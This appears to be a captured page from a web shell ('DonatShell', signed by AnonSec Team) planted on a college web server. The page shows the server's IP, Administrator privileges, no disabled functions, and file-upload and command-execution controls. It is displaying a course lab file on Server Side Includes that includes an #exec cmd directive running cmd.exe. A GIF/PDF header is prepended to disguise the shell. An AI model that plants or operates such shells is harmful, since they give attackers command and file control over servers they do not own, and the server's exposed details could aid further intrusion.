GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/MichaelMalz/CST1611/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/MichaelMalz/CST1611//Lab06.shtml.cloak
<h3>
Sample SSI commands are shown below.<br>
The SSI command is first shown in <span style="color:blue;">blue</span>.<br>
Followed by the output in black.<br>
Comments are in <span style="color:red;">red</span>.
</h3>
<p>
<span style="color:blue;">
&lt;!--#echo var="DATE_LOCAL" --&gt;
<br>
</span>
<!--#echo var="DATE_LOCAL" -->
</p>

<p>
<span style="color:blue;">
&lt;!--#config timefmt="%A %B %d, %Y" --&gt;<br>
Today is &lt;!--#echo var="DATE_LOCAL" --&gt;
<br>
</span>
<!--#config timefmt="%A %B %d, %Y" -->
Today is <!--#echo var="DATE_LOCAL" -->
</p>

<p>
<span style="color:blue;">
This document last modified &lt;!--#flastmod file="ssi.shtml" --&gt;
<br>
</span>
This document last modified Sunday August 24, 2008
</p>

<p>
<span style="color:blue;">
&lt;!--#include virtual="ssi_include.htm" --&gt;
<br>
</span>
<!--#include virtual="lab06/ssi_include.htm/ssi_include.htm" -->
</p>

<p>
<span style="color:blue;">
&lt;pre&gt;<br>
&lt;!--#exec cmd="c:\Windows\system32\cmd.exe /c dir" --&gt;<br>
&lt;/pre&gt;
<br>
</span>
<pre style="font-size:12px;">
<!--#exec cmd="c:\Windows\system32\cmd.exe /c dir" -->
</pre>
<span style="color:red;">
The #exec directive does not work in Windows! Even if it executes output is not returned and any command executed does not have any system rights. Fortunately you can use Perl or PHP scripts to execute Windows commands.
<br>
I have an example Perl file. If you want to test it: Download <a href="http://cst.ridgewater.edu/JimMartinson/CST1611/Lab06/Perl_Windows_command_example.pl">Perl_Windows_command_example.pl</a>, save it in your <b>Lab06</b> folder, and load it in your browser.
</span>
</p>

Anon7 - 2022
AnonSec Team